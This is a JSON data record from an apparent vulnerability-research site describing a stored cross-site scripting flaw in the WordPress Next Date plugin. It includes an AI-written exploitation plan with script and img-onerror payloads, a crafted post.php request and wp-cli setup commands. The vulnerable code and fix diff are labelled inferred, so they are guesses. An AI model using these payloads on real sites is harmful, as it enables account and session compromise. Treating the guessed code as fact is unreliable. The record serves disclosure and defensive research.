[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fh68ebjrKCt0Dqir050bFf8CS4U_019P2kOi56Sxc5Dk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-4920","next-date-authenticated-contributor-stored-cross-site-scripting-via-default-shortcode-attribute","Next Date \u003C= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'default' Shortcode Attribute","The Next Date plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'default' shortcode attribute in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","nextdate",null,"\u003C=1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-11 19:07:24","2026-05-12 07:48:24",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F89e053ac-6ef9-4f5a-8aab-bdca40d68ab4?source=api-prod",[],"researched",false,3,"This research plan outlines the technical analysis and exploitation steps for **CVE-2026-4920** (Note: Likely a typo for 2024-4920), a Stored Cross-Site Scripting (XSS) vulnerability in the WordPress plugin **Next Date** (versions \u003C= 1.0).\n\n---\n\n### 1. Vulnerability Summary\nThe **Next Date** plugin (slug: `nextdate`) provides a shortcode to calculate and display future dates. The vulnerability exists in the shortcode's handling of the `default` attribute. When the shortcode is processed, the value provided in the `default` attribute is rendered on the page without sufficient sanitization or output escaping. This allows an authenticated user with at least Contributor-level privileges to embed malicious JavaScript within a post or page.\n\n### 2. Attack Vector Analysis\n*   **Shortcode Name:** `[nextdate]` (inferred from plugin slug) or `[next_date]` (inferred).\n*   **Vulnerable Attribute:** `default`\n*   **Authentication Requirement:** Contributor+ (any role allowed to create\u002Fedit posts).\n*   **Persistence:** Stored (the payload is saved within the post content in the `wp_posts` table).\n*   **Trigger:** Execution occurs whenever a user (including administrators) views the post containing the malicious shortcode on the frontend or during a preview in the backend.\n\n### 3. Code Flow (Inferred)\n1.  **Registration:** The plugin registers the shortcode during the `init` hook using `add_shortcode( 'nextdate', 'callback_function' )`.\n2.  **Attribute Parsing:** Inside the callback function, `shortcode_atts()` is used to merge user-supplied attributes with defaults.\n    ```php\n    $atts = shortcode_atts( array(\n        'date'    => '',\n        'format'  => 'Y-m-d',\n        'default' => '', \u002F\u002F Vulnerable attribute\n    ), $atts );\n    ```\n3.  **Processing:** The plugin attempts to calculate the \"next date\" based on the `date` attribute.\n4.  **The Sink:** If calculation fails or if the `default` value is intended to be shown alongside the date, the plugin returns a string containing the raw `$atts['default']` value.\n    ```php\n    \u002F\u002F Vulnerable output pattern\n    return '\u003Cspan class=\"next-date\">' . $atts['default'] . '\u003C\u002Fspan>'; \n    ```\n5.  **Rendering:** WordPress echoes the returned value of the shortcode callback on the frontend, executing the injected script.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does not involve a custom AJAX or REST API endpoint that requires a plugin-specific nonce. Instead, it leverages the standard WordPress **Post Creation\u002FEditing flow**.\n\nTo automate this with an agent:\n1.  **Context:** The agent needs a valid `_wpnonce` and `post_ID` to update a post via `wp-admin\u002Fpost.php`.\n2.  **Acquisition:**\n    *   Log in as a Contributor.\n    *   Navigate to `wp-admin\u002Fpost-new.php`.\n    *   Extract the `_wpnonce` from the HTML source (specifically the `#_wpnonce` input field).\n    *   Alternatively, use the WordPress REST API which requires an `X-WP-Nonce` header, obtainable from any admin page via:\n        `browser_eval(\"wpApiSettings.nonce\")`\n\n### 5. Exploitation Strategy\nThe goal is to store a payload that executes `alert(document.domain)` when viewed.\n\n**Step 1: Test for Shortcode Existence**\nUse `wp-cli` to confirm the shortcode is active:\n```bash\nwp eval \"echo shortcode_exists('nextdate') ? 'exists' : 'not found';\"\n```\n\n**Step 2: Submit the Payload**\nUse the `http_request` tool to create a post as a Contributor. We will use the standard WordPress `post.php` handler.\n\n*   **URL:** `http:\u002F\u002F[target]\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Payload:**\n    ```text\n    action=editpost\n    &post_ID=[POST_ID]\n    &_wpnonce=[NONCE]\n    &post_title=XSS+Test\n    &content=[nextdate+default=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]\n    &post_status=publish\n    ```\n    *Note: Contributors cannot \"publish\" directly; they will \"Submit for Review\". The payload will still be stored and viewable via the preview link or when an Admin views the post.*\n\n**Step 3: Triggering the XSS**\nNavigate to the frontend URL of the post or the preview URL:\n`http:\u002F\u002F[target]\u002F?p=[POST_ID]&preview=true`\n\n### 6. Test Data Setup\n1.  **Create User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n    ```\n2.  **Create Initial Draft:**\n    ```bash\n    wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID) --post_title=\"Draft\"\n    ```\n    *Capture the returned Post ID for use in the HTTP request.*\n\n### 7. Expected Results\n*   The HTTP request should return a `302 Redirect` back to the post editor.\n*   Upon visiting the post URL, the browser should render the following HTML (inferred):\n    `\u003Cspan class=\"next-date\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fspan>`\n*   An alert box should appear in the browser context.\n\n### 8. Verification Steps\nAfter performing the HTTP exploit, verify the database state using `wp-cli`:\n```bash\n# Check if the shortcode with the payload is stored in the post content\nwp post get [POST_ID] --field=post_content\n```\n\n### 9. Alternative Approaches\nIf the `default` attribute is reflected inside an HTML attribute (e.g., a `value` or `title` tag), use an attribute breakout payload:\n\n*   **Targeting Attribute Sink:**\n    `[nextdate default='\">\u003Cimg src=x onerror=alert(1)>']`\n*   **Targeting Style Sink:**\n    If the attribute is placed inside a `style` tag:\n    `[nextdate default='expression(alert(1))']` (for older IE) or `[nextdate default='background:url(\"javascript:alert(1)\")']`\n\nIf the shortcode name `[nextdate]` is incorrect, search the plugin directory for the registration:\n```bash\ngrep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Fnextdate\u002F\n```","The Next Date plugin for WordPress (versions up to and including 1.0) is vulnerable to Stored Cross-Site Scripting via the 'default' shortcode attribute. This allows authenticated users with Contributor-level access or higher to inject malicious JavaScript into posts that executes in the context of any user viewing the page.","\u002F* next-date\u002Fnext-date.php (inferred) *\u002F\n\n$atts = shortcode_atts( array(\n    'date'    => '',\n    'format'  => 'Y-m-d',\n    'default' => '', \u002F\u002F Vulnerable attribute defined here\n), $atts );\n\n\u002F\u002F ... calculation logic ...\n\n\u002F* The return value is rendered unescaped on the frontend *\u002F\nreturn '\u003Cspan class=\"next-date\">' . $atts['default'] . '\u003C\u002Fspan>';","--- next-date\u002Fnext-date.php\n+++ next-date\u002Fnext-date.php\n@@ -12,1 +12,1 @@\n-return '\u003Cspan class=\"next-date\">' . $atts['default'] . '\u003C\u002Fspan>';\n+return '\u003Cspan class=\"next-date\">' . esc_html( $atts['default'] ) . '\u003C\u002Fspan>';","To exploit this vulnerability, an attacker needs a WordPress account with at least Contributor-level privileges. \n\n1. Authenticate as a Contributor and navigate to the post editor (e.g., wp-admin\u002Fpost-new.php).\n2. Insert a shortcode containing a JavaScript payload within the 'default' attribute, such as: [nextdate default=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"].\n3. Save the post as a draft or submit it for review. The payload is now stored in the database.\n4. The vulnerability is triggered when any user, including an administrator, views the post on the frontend or via the post preview. The plugin will render the raw script tag within the HTML span, causing the browser to execute the attacker's code.","gemini-3-flash-preview","2026-05-20 18:36:40","2026-05-20 18:37:15",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnextdate\u002Ftags"]